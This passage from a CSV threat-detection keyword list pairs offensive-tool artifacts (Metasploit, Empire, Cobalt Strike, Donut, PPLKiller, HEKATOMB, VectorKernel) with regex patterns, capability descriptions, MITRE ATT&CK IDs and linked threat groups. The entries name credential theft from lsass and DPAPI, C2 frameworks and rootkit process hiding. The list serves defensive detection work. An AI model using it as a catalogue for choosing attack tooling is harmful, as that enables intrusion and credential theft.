Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55523" "*ProcessHerpaderping_x86*",".{0,1000}ProcessHerpaderping_x86.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55524" "*ProcessHerpaderpingTemplate*",".{0,1000}ProcessHerpaderpingTemplate.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55525" "*processhider.c*",".{0,1000}processhider\.c.{0,1000}","offensive_tool_keyword","Sudomy","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your specific process. unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a process which while run another process. So we can assume that this process is unstoppable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/Vegile","1","1","#linux","N/A","N/A","8","726","164","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z","55526" "*-ProcessID * -Dll * -Module *",".{0,1000}\-ProcessID\s.{0,1000}\s\-Dll\s.{0,1000}\s\-Module\s.{0,1000}","offensive_tool_keyword","empire","empire script arguments Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55527" "*processImplantMessage*",".{0,1000}processImplantMessage.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","55528" "*process-inject *",".{0,1000}process\-inject\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","55529" "*processinject_min_alloc*",".{0,1000}processinject_min_alloc.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 
- T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","55530" "*ProcessManager.exe --machine *",".{0,1000}ProcessManager\.exe\s\-\-machine\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","55531" "*ProcessManager.exe --name explorer*",".{0,1000}ProcessManager\.exe\s\-\-name\sexplorer.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","55532" "*processPIDByName*lsass.exe*",".{0,1000}processPIDByName.{0,1000}lsass\.exe.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","N/A","10","10","933","139","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z","55533" "*ProcessPPKFile*",".{0,1000}ProcessPPKFile.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55534" "*ProcessPuTTYLocal*",".{0,1000}ProcessPuTTYLocal.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55535" "*ProcessRDPFile*",".{0,1000}ProcessRDPFile.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55536" "*ProcessRDPLocal*",".{0,1000}ProcessRDPLocal.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55537" "*ProcessSuperPuTTYFile*",".{0,1000}ProcessSuperPuTTYFile.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55538" "*Process-TaskingPackets*",".{0,1000}Process\-TaskingPackets.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1059","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55539" "*ProcessThoroughLocal*",".{0,1000}ProcessThoroughLocal.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55540" "*ProcessThoroughRemote*",".{0,1000}ProcessThoroughRemote.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55541" "*Processus-Thief/HEKATOMB*",".{0,1000}Processus\-Thief\/HEKATOMB.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. 
Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/Processus-Thief/HEKATOMB","1","1","N/A","N/A","10","","N/A","","","","55542" "*ProcessWinSCPLocal*",".{0,1000}ProcessWinSCPLocal.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55543" "*ProcHideClient.exe -*",".{0,1000}ProcHideClient\.exe\s\-.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","55544" "*ProcHideDrv_x64.sys*",".{0,1000}ProcHideDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation 